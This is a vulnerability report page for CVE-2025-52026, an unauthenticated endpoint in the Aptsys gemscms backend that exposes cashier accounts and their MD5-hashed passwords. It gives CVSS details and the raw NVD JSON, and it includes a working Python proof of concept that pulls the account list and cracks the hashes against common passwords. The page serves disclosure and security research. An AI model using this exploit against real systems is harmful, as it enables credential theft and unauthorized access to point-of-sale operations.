Security Vulnerability Report
中文
CVE-2025-52026 CVSS 7.5 HIGH

CVE-2025-52026

Published: 2026-01-23 21:15:51
Last Modified: 2026-02-12 16:48:22
Source: [email protected]

Description

An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:* - VULNERABLE
Aptsys gemscms <= 2025-05-28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json import hashlib # CVE-2025-52026 PoC - Unauthenticated Information Disclosure # Target: Aptsys gemscms /srvs/membersrv/getCashiers endpoint def exploit_cve_2025_52026(target_url): """ Exploit for CVE-2025-52026 This PoC demonstrates the unauthenticated access to cashier accounts """ # Target endpoint endpoint = f"{target_url}/srvs/membersrv/getCashiers" print(f"[*] Targeting: {endpoint}") print(f"[*] Exploiting CVE-2025-52026...") try: # Send unauthenticated request response = requests.get(endpoint, timeout=10) if response.status_code == 200: data = response.json() print(f"[+] Success! Retrieved {len(data)} cashier accounts") print("\n[+] Cashier Data:") print(json.dumps(data, indent=2, ensure_ascii=False)) # Attempt MD5 hash cracking for each account print("\n[*] Attempting MD5 hash cracking...") for account in data: if 'password_hash' in account: password = crack_md5(account['password_hash']) if password: print(f"[+] Cracked: {account.get('username', 'N/A')} -> {password}") return data else: print(f"[-] Failed with status code: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def crack_md5(md5_hash): """ Attempt to crack MD5 hash using common password list Note: For educational purposes only """ common_passwords = [ '123456', 'password', '12345678', 'qwerty', 'admin', '123456789', 'letmein', 'welcome', 'monkey', '1234567', '12345', '1234', 'password1', 'admin123', 'root', '111111', '123123', 'pass', 'test', 'changeme' ] for pwd in common_passwords: if hashlib.md5(pwd.encode()).hexdigest() == md5_hash: return pwd return None if __name__ == "__main__": # Example usage target = "https://vulnerable-server.com" exploit_cve_2025_52026(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52026", "sourceIdentifier": "[email protected]", "published": "2026-01-23T21:15:50.813", "lastModified": "2026-02-12T16:48:21.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability exists in the /srvs/membersrv/getCashiers endpoint of the Aptsys gemscms backend platform thru 2025-05-28. This unauthenticated endpoint returns a list of cashier accounts, including names, email addresses, usernames, and passwords hashed using MD5. As MD5 is a broken cryptographic function, the hashes can be easily reversed using public tools, exposing user credentials in plaintext. This allows remote attackers to perform unauthorized logins and potentially gain access to sensitive POS operations or backend functions."}, {"lang": "es", "value": "Existe una vulnerabilidad de revelación de información en el endpoint /srvs/membersrv/getCashiers de la plataforma de backend Aptsys gemscms hasta el 28-05-2025. Este endpoint no autenticado devuelve una lista de cuentas de cajero, incluyendo nombres, direcciones de correo electrónico, nombres de usuario y contraseñas hasheadas usando MD5. Dado que MD5 es una función criptográfica rota, los hashes pueden ser fácilmente revertidos usando herramientas públicas, exponiendo las credenciales de usuario en texto plano. Esto permite a atacantes remotos realizar inicios de sesión no autorizados y potencialmente obtener acceso a operaciones POS sensibles o funciones de backend."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aptsys:gemscms_backend:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025-05-28", "matchCriteriaId": "1F83E13A-9AF7-4E42-9849-9D9684967078"}]}]}], "references": [{"url": "http://aptsys.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.